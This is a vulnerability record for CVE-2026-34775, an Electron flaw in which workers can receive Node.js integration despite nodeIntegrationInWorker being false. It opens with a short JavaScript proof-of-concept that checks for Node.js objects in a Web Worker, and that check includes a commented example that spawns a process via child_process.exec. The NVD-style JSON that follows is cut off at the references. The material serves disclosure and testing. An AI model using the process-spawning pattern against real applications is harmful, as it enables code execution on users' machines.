CVE-2026-34775

// PoC Concept for CVE-2026-34775 // This code attempts to verify if Node.js integration is available // inside a Web Worker where it should be disabled. const workerScript = ` self.onmessage = function(e) { // Check for Node.js specific objects if (typeof process !== 'undefined' || typeof require !== 'undefined') { postMessage('VULNERABLE: Node.js integration detected!'); // Example malicious action: require('child_process').exec('calc.exe'); } else { postMessage('SECURE: No Node.js integration detected.'); } }; `; // Create a Blob to run the worker script const blob = new Blob([workerScript], { type: 'application/javascript' }); const workerUrl = URL.createObjectURL(blob); // Initialize the worker in a frame context const worker = new Worker(workerUrl); worker.onmessage = function(e) { console.log(e.data); };

{"cve": {"id": "CVE-2026-34775", "sourceIdentifier": "[email protected]", "published": "2026-04-04T00:16:18.597", "lastModified": "2026-04-22T17:49:37.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to versions 38.8.6, 39.8.4, 40.8.4, and 41.0.0, the nodeIntegrationInWorker webPreference was not correctly scoped in all configurations. In certain process-sharing scenarios, workers spawned in frames configured with nodeIntegrationInWorker: false could still receive Node.js integration. Apps are only affected if they enable nodeIntegrationInWorker. Apps that do not use nodeIntegrationInWorker are not affected. This issue has been patched in versions 38.8.6, 39.8.4, 40.8.4, and 41.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-653"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "38.8.6", "matchCriteriaId": "9CE003A2-03CC-4355-AA17-2CBD204EC6C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "39.0.0", "versionEndExcluding": "39.8.4", "matchCriteriaId": "4B7EE232-AF54-4E15-96C2-4D1B6CCAE453"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "40.0.0", "versionEndExcluding": "40.8.4", "matchCriteriaId": "0FA5994B-42A6-4C19-BEB3-BE28C74ABCEF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "A20225D6-F435-4D09-962D-B162F521B6AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha2:*:*:*:node.js:*:*", "matchCriteriaId": "33712802-EB60-4E9A-83B8-9F2320B70CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha3:*:*:*:node.js:*:*", "matchCriteriaId": "9D0A9142-54FE-47BB-9FEB-5E97528E28FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha4:*:*:*:node.js:*:*", "matchCriteriaId": "9E1D191F-DEAE-4DB3-9822-F31AF9FE3BAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha5:*:*:*:node.js:*:*", "matchCriteriaId": "45A8192F-3D2C-4987-9BBE-7ECC3F71965D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha6:*:*:*:node.js:*:*", "matchCriteriaId": "EEA1A2E5-03DB-46CB-8427-7F31A8A7CE1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta1:*:*:*:node.js:*:*", "matchCriteriaId": "B2DFCE75-BD3F-4537-B5B8-14097E262EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta2:*:*:*:node.js:*:*", "matchCriteriaId": "BC346E25-EA43-4615-8CDB-16D15D46E4FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta3:*:*:*:node.js:*:*", "matchCriteriaId": "FA5B3C00-CAFC-4995-BF35-9920F3039E77"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta4:*:*:*:node.js:*:*", "matchCriteriaId": "3672F3FB-6B5E-40FD-8A92-CB4DD6BC6A93"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta5:*:*:*:node.js:*:*", "matchCriteriaId": "9EE4F8AE-21D2-4815-85B7-B7ECCC0D5059"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta6:*:*:*:node.js:*:*", "matchCriteriaId": "D195760C-7DD9-4259-9042-EDE65AEAC1D6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta7:*:*:*:node.js:*:*", "matchCriteriaId": "B370859F-24D3-4B25-B580-1A5B6DB94BFE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta8:*:*:*:node.js:*:*", "matchCriteriaId": "7F47CFAE-9744-4B54-B7E4-BB8E4346FDBA"}]}]}], "references": [{"url": "https://github.com/electron/electron/security/advisories/GHSA-xwr5-m59h-vwqr", "source": "security-advisori ... (truncated)